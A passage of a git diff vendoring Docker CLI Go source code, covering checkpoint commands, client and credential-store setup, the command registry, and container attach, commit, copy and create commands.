20, 1, 3, ' ', 0) + fmt.Fprintf(w, "CHECKPOINT NAME") + fmt.Fprintf(w, "\n") + + for _, checkpoint := range checkpoints { + fmt.Fprintf(w, "%s\t", checkpoint.Name) + fmt.Fprint(w, "\n") + } + + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go new file mode 100644 index 0000000000..ec39fa7b55 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go @@ -0,0 +1,44 @@ +package checkpoint + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + checkpointDir string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] CONTAINER CHECKPOINT", + Aliases: []string{"remove"}, + Short: "Remove a checkpoint", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args[0], args[1], opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd +} + +func runRemove(dockerCli *command.DockerCli, container string, checkpoint string, opts removeOptions) error { + client := dockerCli.Client() + + removeOpts := types.CheckpointDeleteOptions{ + CheckpointID: checkpoint, + CheckpointDir: opts.checkpointDir, + } + + return client.CheckpointDelete(context.Background(), container, removeOpts) +} diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go new file mode 100644 index 0000000000..6d1dd7472e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/cli.go @@ -0,0 +1,260 @@ +package command + +import ( + "errors" + "fmt" + "io" + "net/http" + "os" + "path/filepath" + "runtime" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/cliconfig/credentials" + "github.com/docker/docker/client" + "github.com/docker/docker/dockerversion" + dopts "github.com/docker/docker/opts" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// Streams is an interface which exposes the standard input and output streams +type Streams interface { + In() *InStream + Out() *OutStream + Err() io.Writer +} + +// DockerCli represents the docker command line client. +// Instances of the client can be returned from NewDockerCli. +type DockerCli struct { + configFile *configfile.ConfigFile + in *InStream + out *OutStream + err io.Writer + keyFile string + client client.APIClient + hasExperimental bool + defaultVersion string +} + +// HasExperimental returns true if experimental features are accessible. +func (cli *DockerCli) HasExperimental() bool { + return cli.hasExperimental +} + +// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified. +func (cli *DockerCli) DefaultVersion() string { + return cli.defaultVersion +} + +// Client returns the APIClient +func (cli *DockerCli) Client() client.APIClient { + return cli.client +} + +// Out returns the writer used for stdout +func (cli *DockerCli) Out() *OutStream { + return cli.out +} + +// Err returns the writer used for stderr +func (cli *DockerCli) Err() io.Writer { + return cli.err +} + +// In returns the reader used for stdin +func (cli *DockerCli) In() *InStream { + return cli.in +} + +// ShowHelp shows the command help. +func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error { + cmd.SetOutput(cli.err) + cmd.HelpFunc()(cmd, args) + return nil +} + +// ConfigFile returns the ConfigFile +func (cli *DockerCli) ConfigFile() *configfile.ConfigFile { + return cli.configFile +} + +// GetAllCredentials returns all of the credentials stored in all of the +// configured credential stores. +func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) { + auths := make(map[string]types.AuthConfig) + for registry := range cli.configFile.CredentialHelpers { + helper := cli.CredentialsStore(registry) + newAuths, err := helper.GetAll() + if err != nil { + return nil, err + } + addAll(auths, newAuths) + } + defaultStore := cli.CredentialsStore("") + newAuths, err := defaultStore.GetAll() + if err != nil { + return nil, err + } + addAll(auths, newAuths) + return auths, nil +} + +func addAll(to, from map[string]types.AuthConfig) { + for reg, ac := range from { + to[reg] = ac + } +} + +// CredentialsStore returns a new credentials store based +// on the settings provided in the configuration file. Empty string returns +// the default credential store. +func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store { + if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" { + return credentials.NewNativeStore(cli.configFile, helper) + } + return credentials.NewFileStore(cli.configFile) +} + +// getConfiguredCredentialStore returns the credential helper configured for the +// given registry, the default credsStore, or the empty string if neither are +// configured. +func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string { + if c.CredentialHelpers != nil && serverAddress != "" { + if helper, exists := c.CredentialHelpers[serverAddress]; exists { + return helper + } + } + return c.CredentialsStore +} + +// Initialize the dockerCli runs initialization that must happen after command +// line flags are parsed. +func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error { + cli.configFile = LoadDefaultConfigFile(cli.err) + + var err error + cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile) + if err != nil { + return err + } + + cli.defaultVersion = cli.client.ClientVersion() + + if opts.Common.TrustKey == "" { + cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) + } else { + cli.keyFile = opts.Common.TrustKey + } + + if ping, err := cli.client.Ping(context.Background()); err == nil { + cli.hasExperimental = ping.Experimental + + // since the new header was added in 1.25, assume server is 1.24 if header is not present. + if ping.APIVersion == "" { + ping.APIVersion = "1.24" + } + + // if server version is lower than the current cli, downgrade + if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) { + cli.client.UpdateClientVersion(ping.APIVersion) + } + } + return nil +} + +// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err. +func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli { + return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err} +} + +// LoadDefaultConfigFile attempts to load the default config file and returns +// an initialized ConfigFile struct if none is found. +func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile { + configFile, e := cliconfig.Load(cliconfig.ConfigDir()) + if e != nil { + fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e) + } + if !configFile.ContainsAuth() { + credentials.DetectDefaultStore(configFile) + } + return configFile +} + +// NewAPIClientFromFlags creates a new APIClient from command line flags +func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) { + host, err := getServerHost(opts.Hosts, opts.TLSOptions) + if err != nil { + return &client.Client{}, err + } + + customHeaders := configFile.HTTPHeaders + if customHeaders == nil { + customHeaders = map[string]string{} + } + customHeaders["User-Agent"] = UserAgent() + + verStr := api.DefaultVersion + if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" { + verStr = tmpStr + } + + httpClient, err := newHTTPClient(host, opts.TLSOptions) + if err != nil { + return &client.Client{}, err + } + + return client.NewClient(host, verStr, httpClient, customHeaders) +} + +func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) { + switch len(hosts) { + case 0: + host = os.Getenv("DOCKER_HOST") + case 1: + host = hosts[0] + default: + return "", errors.New("Please specify only one -H") + } + + host, err = dopts.ParseHost(tlsOptions != nil, host) + return +} + +func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) { + if tlsOptions == nil { + // let the api client configure the default transport. + return nil, nil + } + + config, err := tlsconfig.Client(*tlsOptions) + if err != nil { + return nil, err + } + tr := &http.Transport{ + TLSClientConfig: config, + } + proto, addr, _, err := client.ParseHost(host) + if err != nil { + return nil, err + } + + sockets.ConfigureTransport(tr, proto, addr) + + return &http.Client{ + Transport: tr, + }, nil +} + +// UserAgent returns the user agent string used for making API requests +func UserAgent() string { + return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")" +} diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go new file mode 100644 index 0000000000..d64d5680cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/commands/commands.go @@ -0,0 +1,91 @@ +package commands + +import ( + "os" + + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/checkpoint" + "github.com/docker/docker/cli/command/container" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/cli/command/network" + "github.com/docker/docker/cli/command/node" + "github.com/docker/docker/cli/command/plugin" + "github.com/docker/docker/cli/command/registry" + "github.com/docker/docker/cli/command/secret" + "github.com/docker/docker/cli/command/service" + "github.com/docker/docker/cli/command/stack" + "github.com/docker/docker/cli/command/swarm" + "github.com/docker/docker/cli/command/system" + "github.com/docker/docker/cli/command/volume" + "github.com/spf13/cobra" +) + +// AddCommands adds all the commands from cli/command to the root command +func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) { + cmd.AddCommand( + node.NewNodeCommand(dockerCli), + service.NewServiceCommand(dockerCli), + swarm.NewSwarmCommand(dockerCli), + secret.NewSecretCommand(dockerCli), + container.NewContainerCommand(dockerCli), + image.NewImageCommand(dockerCli), + system.NewSystemCommand(dockerCli), + container.NewRunCommand(dockerCli), + image.NewBuildCommand(dockerCli), + network.NewNetworkCommand(dockerCli), + hide(system.NewEventsCommand(dockerCli)), + registry.NewLoginCommand(dockerCli), + registry.NewLogoutCommand(dockerCli), + registry.NewSearchCommand(dockerCli), + system.NewVersionCommand(dockerCli), + volume.NewVolumeCommand(dockerCli), + hide(system.NewInfoCommand(dockerCli)), + hide(container.NewAttachCommand(dockerCli)), + hide(container.NewCommitCommand(dockerCli)), + hide(container.NewCopyCommand(dockerCli)), + hide(container.NewCreateCommand(dockerCli)), + hide(container.NewDiffCommand(dockerCli)), + hide(container.NewExecCommand(dockerCli)), + hide(container.NewExportCommand(dockerCli)), + hide(container.NewKillCommand(dockerCli)), + hide(container.NewLogsCommand(dockerCli)), + hide(container.NewPauseCommand(dockerCli)), + hide(container.NewPortCommand(dockerCli)), + hide(container.NewPsCommand(dockerCli)), + hide(container.NewRenameCommand(dockerCli)), + hide(container.NewRestartCommand(dockerCli)), + hide(container.NewRmCommand(dockerCli)), + hide(container.NewStartCommand(dockerCli)), + hide(container.NewStatsCommand(dockerCli)), + hide(container.NewStopCommand(dockerCli)), + hide(container.NewTopCommand(dockerCli)), + hide(container.NewUnpauseCommand(dockerCli)), + hide(container.NewUpdateCommand(dockerCli)), + hide(container.NewWaitCommand(dockerCli)), + hide(image.NewHistoryCommand(dockerCli)), + hide(image.NewImagesCommand(dockerCli)), + hide(image.NewImportCommand(dockerCli)), + hide(image.NewLoadCommand(dockerCli)), + hide(image.NewPullCommand(dockerCli)), + hide(image.NewPushCommand(dockerCli)), + hide(image.NewRemoveCommand(dockerCli)), + hide(image.NewSaveCommand(dockerCli)), + hide(image.NewTagCommand(dockerCli)), + hide(system.NewInspectCommand(dockerCli)), + stack.NewStackCommand(dockerCli), + stack.NewTopLevelDeployCommand(dockerCli), + checkpoint.NewCheckpointCommand(dockerCli), + plugin.NewPluginCommand(dockerCli), + ) + +} + +func hide(cmd *cobra.Command) *cobra.Command { + if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" { + return cmd + } + cmdCopy := *cmd + cmdCopy.Hidden = true + cmdCopy.Aliases = []string{} + return &cmdCopy +} diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go new file mode 100644 index 0000000000..31bb109344 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/attach.go @@ -0,0 +1,130 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/signal" + "github.com/spf13/cobra" +) + +type attachOptions struct { + noStdin bool + proxy bool + detachKeys string + + container string +} + +// NewAttachCommand creates a new cobra.Command for `docker attach` +func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts attachOptions + + cmd := &cobra.Command{ + Use: "attach [OPTIONS] CONTAINER", + Short: "Attach to a running container", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runAttach(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN") + flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + return cmd +} + +func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error { + ctx := context.Background() + client := dockerCli.Client() + + c, err := client.ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if !c.State.Running { + return fmt.Errorf("You cannot attach to a stopped container, start it first") + } + + if c.State.Paused { + return fmt.Errorf("You cannot attach to a paused container, unpause it first") + } + + if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil { + return err + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: !opts.noStdin && c.Config.OpenStdin, + Stdout: true, + Stderr: true, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + var in io.ReadCloser + if options.Stdin { + in = dockerCli.In() + } + + if opts.proxy && !c.Config.Tty { + sigc := ForwardAllSignals(ctx, dockerCli, opts.container) + defer signal.StopCatch(sigc) + } + + resp, errAttach := client.ContainerAttach(ctx, opts.container, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach returns an ErrPersistEOF (connection closed) + // means server met an error and put it in Hijacked connection + // keep the error and read detailed error message from hijacked connection later + return errAttach + } + defer resp.Close() + + if c.Config.Tty && dockerCli.Out().IsTerminal() { + height, width := dockerCli.Out().GetTtySize() + // To handle the case where a user repeatedly attaches/detaches without resizing their + // terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially + // resize it, then go back to normal. Without this, every attach after the first will + // require the user to manually resize or hit enter. + resizeTtyTo(ctx, client, opts.container, height+1, width+1, false) + + // After the above resizing occurs, the call to MonitorTtySize below will handle resetting back + // to the actual size. + if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil { + logrus.Debugf("Error monitoring TTY size: %s", err) + } + } + if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil { + return err + } + + if errAttach != nil { + return errAttach + } + + _, status, err := getExitCode(ctx, dockerCli, opts.container) + if err != nil { + return err + } + if status != 0 { + return cli.StatusError{StatusCode: status} + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go new file mode 100644 index 0000000000..3e9b4880ac --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/cmd.go @@ -0,0 +1,46 @@ +package container + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewContainerCommand returns a cobra command for `container` subcommands +func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "container", + Short: "Manage containers", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewAttachCommand(dockerCli), + NewCommitCommand(dockerCli), + NewCopyCommand(dockerCli), + NewCreateCommand(dockerCli), + NewDiffCommand(dockerCli), + NewExecCommand(dockerCli), + NewExportCommand(dockerCli), + NewKillCommand(dockerCli), + NewLogsCommand(dockerCli), + NewPauseCommand(dockerCli), + NewPortCommand(dockerCli), + NewRenameCommand(dockerCli), + NewRestartCommand(dockerCli), + NewRmCommand(dockerCli), + NewRunCommand(dockerCli), + NewStartCommand(dockerCli), + NewStatsCommand(dockerCli), + NewStopCommand(dockerCli), + NewTopCommand(dockerCli), + NewUnpauseCommand(dockerCli), + NewUpdateCommand(dockerCli), + NewWaitCommand(dockerCli), + newListCommand(dockerCli), + newInspectCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go new file mode 100644 index 0000000000..cf8d0102a6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/commit.go @@ -0,0 +1,76 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + dockeropts "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type commitOptions struct { + container string + reference string + + pause bool + comment string + author string + changes dockeropts.ListOpts +} + +// NewCommitCommand creates a new cobra.Command for `docker commit` +func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts commitOptions + + cmd := &cobra.Command{ + Use: "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]", + Short: "Create a new image from a container's changes", + Args: cli.RequiresRangeArgs(1, 2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + if len(args) > 1 { + opts.reference = args[1] + } + return runCommit(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit") + flags.StringVarP(&opts.comment, "message", "m", "", "Commit message") + flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith \")") + + opts.changes = dockeropts.NewListOpts(nil) + flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") + + return cmd +} + +func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error { + ctx := context.Background() + + name := opts.container + reference := opts.reference + + options := types.ContainerCommitOptions{ + Reference: reference, + Comment: opts.comment, + Author: opts.author, + Changes: opts.changes.GetAll(), + Pause: opts.pause, + } + + response, err := dockerCli.Client().ContainerCommit(ctx, name, options) + if err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), response.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go new file mode 100644 index 0000000000..17ab2accf9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/cp.go @@ -0,0 +1,303 @@ +package container + +import ( + "fmt" + "io" + "os" + "path/filepath" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/system" + "github.com/spf13/cobra" +) + +type copyOptions struct { + source string + destination string + followLink bool +} + +type copyDirection int + +const ( + fromContainer copyDirection = (1 << iota) + toContainer + acrossContainers = fromContainer | toContainer +) + +type cpConfig struct { + followLink bool +} + +// NewCopyCommand creates a new `docker cp` command +func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts copyOptions + + cmd := &cobra.Command{ + Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- + docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`, + Short: "Copy files/folders between a container and the local filesystem", + Long: strings.Join([]string{ + "Copy files/folders between a container and the local filesystem\n", + "\nUse '-' as the source to read a tar archive from stdin\n", + "and extract it to a directory destination in a container.\n", + "Use '-' as the destination to stream a tar archive of a\n", + "container source to stdout.", + }, ""), + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + if args[0] == "" { + return fmt.Errorf("source can not be empty") + } + if args[1] == "" { + return fmt.Errorf("destination can not be empty") + } + opts.source = args[0] + opts.destination = args[1] + return runCopy(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH") + + return cmd +} + +func runCopy(dockerCli *command.DockerCli, opts copyOptions) error { + srcContainer, srcPath := splitCpArg(opts.source) + dstContainer, dstPath := splitCpArg(opts.destination) + + var direction copyDirection + if srcContainer != "" { + direction |= fromContainer + } + if dstContainer != "" { + direction |= toContainer + } + + cpParam := &cpConfig{ + followLink: opts.followLink, + } + + ctx := context.Background() + + switch direction { + case fromContainer: + return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam) + case toContainer: + return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam) + case acrossContainers: + // Copying between containers isn't supported. + return fmt.Errorf("copying between containers is not supported") + default: + // User didn't specify any container. + return fmt.Errorf("must specify at least one container source") + } +} + +func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) { + return dockerCli.Client().ContainerStatPath(ctx, containerName, path) +} + +func resolveLocalPath(localPath string) (absPath string, err error) { + if absPath, err = filepath.Abs(localPath); err != nil { + return + } + + return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil +} + +func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) { + if dstPath != "-" { + // Get an absolute destination path. + dstPath, err = resolveLocalPath(dstPath) + if err != nil { + return err + } + } + + // if client requests to follow symbol link, then must decide target file to be copied + var rebaseName string + if cpParam.followLink { + srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath) + + // If the destination is a symbolic link, we should follow it. + if err == nil && srcStat.Mode&os.ModeSymlink != 0 { + linkTarget := srcStat.LinkTarget + if !system.IsAbs(linkTarget) { + // Join with the parent directory. + srcParent, _ := archive.SplitPathDirEntry(srcPath) + linkTarget = filepath.Join(srcParent, linkTarget) + } + + linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget) + srcPath = linkTarget + } + + } + + content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath) + if err != nil { + return err + } + defer content.Close() + + if dstPath == "-" { + // Send the response to STDOUT. + _, err = io.Copy(os.Stdout, content) + + return err + } + + // Prepare source copy info. + srcInfo := archive.CopyInfo{ + Path: srcPath, + Exists: true, + IsDir: stat.Mode.IsDir(), + RebaseName: rebaseName, + } + + preArchive := content + if len(srcInfo.RebaseName) != 0 { + _, srcBase := archive.SplitPathDirEntry(srcInfo.Path) + preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName) + } + // See comments in the implementation of `archive.CopyTo` for exactly what + // goes into deciding how and whether the source archive needs to be + // altered for the correct copy behavior. + return archive.CopyTo(preArchive, srcInfo, dstPath) +} + +func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) { + if srcPath != "-" { + // Get an absolute source path. + srcPath, err = resolveLocalPath(srcPath) + if err != nil { + return err + } + } + + // In order to get the copy behavior right, we need to know information + // about both the source and destination. The API is a simple tar + // archive/extract API but we can use the stat info header about the + // destination to be more informed about exactly what the destination is. + + // Prepare destination copy info by stat-ing the container path. + dstInfo := archive.CopyInfo{Path: dstPath} + dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath) + + // If the destination is a symbolic link, we should evaluate it. + if err == nil && dstStat.Mode&os.ModeSymlink != 0 { + linkTarget := dstStat.LinkTarget + if !system.IsAbs(linkTarget) { + // Join with the parent directory. + dstParent, _ := archive.SplitPathDirEntry(dstPath) + linkTarget = filepath.Join(dstParent, linkTarget) + } + + dstInfo.Path = linkTarget + dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget) + } + + // Ignore any error and assume that the parent directory of the destination + // path exists, in which case the copy may still succeed. If there is any + // type of conflict (e.g., non-directory overwriting an existing directory + // or vice versa) the extraction will fail. If the destination simply did + // not exist, but the parent directory does, the extraction will still + // succeed. + if err == nil { + dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir() + } + + var ( + content io.Reader + resolvedDstPath string + ) + + if srcPath == "-" { + // Use STDIN. + content = os.Stdin + resolvedDstPath = dstInfo.Path + if !dstInfo.IsDir { + return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath)) + } + } else { + // Prepare source copy info. + srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink) + if err != nil { + return err + } + + srcArchive, err := archive.TarResource(srcInfo) + if err != nil { + return err + } + defer srcArchive.Close() + + // With the stat info about the local source as well as the + // destination, we have enough information to know whether we need to + // alter the archive that we upload so that when the server extracts + // it to the specified directory in the container we get the desired + // copy behavior. + + // See comments in the implementation of `archive.PrepareArchiveCopy` + // for exactly what goes into deciding how and whether the source + // archive needs to be altered for the correct copy behavior when it is + // extracted. This function also infers from the source and destination + // info which directory to extract to, which may be the parent of the + // destination that the user specified. + dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo) + if err != nil { + return err + } + defer preparedArchive.Close() + + resolvedDstPath = dstDir + content = preparedArchive + } + + options := types.CopyToContainerOptions{ + AllowOverwriteDirWithFile: false, + } + + return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options) +} + +// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be +// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by +// requiring a LOCALPATH with a `:` to be made explicit with a relative or +// absolute path: +// `/path/to/file:name.txt` or `./file:name.txt` +// +// This is apparently how `scp` handles this as well: +// http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/ +// +// We can't simply check for a filepath separator because container names may +// have a separator, e.g., "host0/cname1" if container is in a Docker cluster, +// so we have to check for a `/` or `.` prefix. Also, in the case of a Windows +// client, a `:` could be part of an absolute Windows path, in which case it +// is immediately proceeded by a backslash. +func splitCpArg(arg string) (container, path string) { + if system.IsAbs(arg) { + // Explicit local absolute path, e.g., `C:\foo` or `/foo`. + return "", arg + } + + parts := strings.SplitN(arg, ":", 2) + + if len(parts) == 1 || strings.HasPrefix(parts[0], ".") { + // Either there's no `:` in the arg + // OR it's an explicit local relative path like `./file:name.txt`. + return "", arg + } + + return parts[0], parts[1] +} diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go new file mode 100644 index 0000000000..d5e63bd9ef --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/create.go @@ -0,0 +1,218 @@ +package container + +import ( + "fmt" + "io" + "os" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + // FIXME migrate to docker/distribution/reference + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + apiclient "github.com/docker/docker/client" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type createOptions struct { + name string +} + +// NewCreateCommand creates a new cobra.Command for `docker create` +func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts createOptions + var copts *runconfigopts.ContainerOptions + + cmd := &cobra.Command{ + Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Create a new container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + copts.Image = args[0] + if len(args) > 1 { + copts.Args = args[1:] + } + return runCreate(dockerCli, cmd.Flags(), &opts, copts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.StringVar(&opts.name, "name", "", "Assign a name to the container") + + // Add an explicit help that doesn't have a `-h` to prevent the conflict + // with hostname + flags.Bool("help", false, "Print usage") + + command.AddTrustedFlags(flags, true) + copts = runconfigopts.AddFlags(flags) + return cmd +} + +func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error { + config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) + if err != nil { + reportError(dockerCli.Err(), "create", err.Error(), true) + return cli.StatusError{StatusCode: 125} + } + response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) + return nil +} + +func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error { + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return err + } + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + + options := types.ImageCreateOptions{ + RegistryAuth: encodedAuth, + } + + responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesStream( + responseBody, + out, + dockerCli.Out().FD(), + dockerCli.Out().IsTerminal(), + nil) +} + +type cidFile struct { + path string + file *os.File + written bool +} + +func (cid *cidFile) Close() error { + cid.file.Close() + + if !cid.written { + if err := os.Remove(cid.path); err != nil { + return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err) + } + } + + return nil +} + +func (cid *cidFile) Write(id string) error { + if _, err := cid.file.Write([]byte(id)); err != nil { + return fmt.Errorf("Failed to write the container ID to the file: %s", err) + } + cid.written = true + return nil +} + +func newCIDFile(path string) (*cidFile, error) { + if _, err := os.Stat(path); err == nil { + return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path) + } + + f, err := os.Create(path) + if err != nil { + return nil, 